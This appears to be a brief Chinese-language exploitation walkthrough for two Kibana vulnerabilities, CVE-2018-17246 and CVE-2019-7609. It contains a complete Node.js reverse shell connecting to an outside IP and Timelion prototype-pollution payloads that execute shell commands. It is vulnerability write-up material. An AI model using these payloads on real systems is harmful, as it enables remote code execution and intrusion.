- 1. kibana是什么
- 2. CVE-2018-17246 文件包含漏洞
- 2.1 利用
- 3. Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)
- 3.1 利用
一般与Elasticsearch一起工作,作用是将Elasticsearch中的数据可视化的表现出来并与之进行交互。它本身是一个web应用,可以通过5601端口去访问。
影响版本:
5.6.13到6.4.3
通常情况下Kibana与其他的应用程序一起部署,如果应用程序可以上传或者写入Javascript文件的话,攻击者可以通过Nodejs创建一个Reverse Shell,内容如下:
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(9999, "192.168.171.1", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("/bin/touch /tmp/success");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')



